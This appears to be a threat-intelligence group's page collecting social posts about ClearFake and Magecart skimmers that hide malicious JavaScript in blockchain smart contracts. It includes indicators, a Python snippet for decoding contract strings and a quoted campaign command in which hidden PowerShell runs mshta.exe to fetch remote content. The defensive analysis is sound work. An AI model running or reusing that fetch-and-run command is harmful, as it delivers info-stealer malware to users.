ThreatCat.ch


ThreatCat.ch was founded in autumn 2022 and consists of a bunch of experienced Cyber Threat Analysts and Incident Responders who have been working together for many years. We decided to create ThreatCat.ch to be able to serve the community by providing warnings and insights about emerging cyber threats. Occasionally we may also write about tools and tricks we have learned in our daily work life. And of course, ThreatCat.ch is about having fun doing interesting stuff together.

Currently we are publishing information on https://twitter.com/threatcat_ch and https://github.com/threatcat-ch/. All our information is distributed under Creative Commons CC BY 4.0, and all our opinions are ours and not those of our employers. You can always reach out to us via [email protected].

Twitter: https://twitter.com/threatcat_ch
Bluesky: @threatcat-ch.bsky.social
GitHub: https://github.com/threatcat-ch
@sekoia_io published a nice blog post about BSC (Binance Smart Chain) https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
@threatcat_ch is tracking BSC as well, and we share our gained information on ThreatFox/MalwareBazaar @abuse_ch. As a side note, most of the delivered payloads led to Rhadamanthys (https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys) instead of Lumma in the last few days.
ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery

ClearFake spreads malware via compromised websites, using fake CAPTCHAs, JavaScript injections, and drive-by downloads.

Sekoia.io Blog

This #Magecart smart contract got updated recently and is now pointing to keritysuc[.]xyz

https://infosec.exchange/@threatcat_ch/114082428887661948

ThreatCat.ch (@[email protected])

#etherhiding (hiding malicious code in blockchain based smart contracts) is not only by #ClearFake related actors – but now also for #Magecart 👇

Infosec Exchange

Decoding gives us another WebSocket-based communication channel: wss://cdn[.]iconstaff[.]top/common?source=

Domain iconstaff[.]top was already reported as being Magecart related in June 2024: https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html

Decoding the Caesar Cipher Skimmer

Discover the latest credit card skimming threat, the "Caesar Cipher Skimmer," affecting multiple CMS platforms like WordPress and Magento. Learn how it works and get essential tips to protect your ecommerce website from these sophisticated attacks.

Sucuri Blog
Let’s take transaction 0x863f7[…] at Sep-02-2024 02:34:55 PM UTC – we get the following decoded JS:
https://testnet.bscscan.com/tx/0x863f748c5965d4ef39b46a621fd764a3a6c03f591376a20af78e4070b7220a74
Another confirmation of the malicious, Magecart-related activity can be found by analyzing other activities from the main BSC testnet contract 0x5178a932d5b312801e02c43fd50399a88028b9d0
https://testnet.bscscan.com/address/0x5178a932d5b312801e02c43fd50399a88028b9d0
This assumption is reinforced when we get a further obfuscated payload from suckerity[.]xyz when visiting the checkout page, and subsequently notice a client-to-server data exfiltration after having entered credit card details (small extract of the ~200KB deobfuscated code):

While investigating an infected website, we noticed a call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95: https://testnet.bscscan.com/address/0x0967296defa0fd586c9ede5730380e2b059fab95

The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare). It is not related to #ClearFake, but reminds us of #Magecart-related injections:

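For readers who want to reproduce the "decoding" step from the posts above: EtherHiding-style contracts typically hand out their JavaScript as a plain ABI-encoded `string` return value, which an analyst can decode offline and then scan for the WebSocket endpoints the posts list. This is an added example written for this page, not ThreatCat.ch's tooling; the return data and the hostname in it are constructed, and only the Python standard library is used.

```python
import re

# Constructed sample: the raw return data of an eth_call against a contract
# function that returns a single ABI `string`. The script and hostname are
# made up for this example; nothing here is taken from a real contract.
def abi_encode_string(s: str) -> str:
    data = s.encode()
    head = (32).to_bytes(32, "big")               # offset of the dynamic part
    length = len(data).to_bytes(32, "big")        # byte length of the string
    padded = data + b"\x00" * (-len(data) % 32)   # right-pad to a 32-byte word
    return "0x" + (head + length + padded).hex()

SAMPLE_JS = 'var s=new WebSocket("wss://cdn.example-c2.test/common?source=x");'
SAMPLE_RETURN_DATA = abi_encode_string(SAMPLE_JS)

def abi_decode_string(hexdata: str) -> str:
    """Decode a single ABI-encoded `string` return value (offset, length, bytes)."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("return data too short for an ABI string")
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared string length exceeds return data")
    return raw[start:start + length].decode("utf-8", errors="replace")

# ws:// and wss:// URLs up to the closing quote or whitespace
WS_RE = re.compile(r"wss?://[A-Za-z0-9.\-]+(?::\d+)?[^\s\"']*")

def defang(url: str) -> str:
    """Defang dots so the indicator is safe to paste into a report."""
    return url.replace(".", "[.]")

def extract_ws_endpoints(js: str) -> list[str]:
    """Return the defanged WebSocket endpoints found in decoded contract JS."""
    return [defang(m.group(0)) for m in WS_RE.finditer(js)]

if __name__ == "__main__":
    decoded = abi_decode_string(SAMPLE_RETURN_DATA)
    print(decoded)
    print(extract_ws_endpoints(decoded))
```

Feeding real eth_call output to `abi_decode_string` works unchanged as long as the function returns exactly one `string`; for other signatures the offset/length layout differs.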

@threatcat_ch Been checking in on this campaign from time to time. New changes:

powershell -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://[DOMAIN]i=${usr_id}' -replace ']')

Also, the info stealer has been changed. Not certain of which as of now. But seems very similar to ACR Stealer.

Today, I'm releasing the first version of a small web app I've been working on for the past few months 🚀: https://rosti.bin.re/

It semi-automatically parses blog posts & reports from nearly 200 cybersecurity sites, extracting IOCs & YARA rules. You can grab the intel in various formats from the website or via API.

I hope it proves useful to some of you ... 🙏✨ #CyberSecurity #ThreatIntel

Rösti - Repackaged Öpen Source Threat Intelligence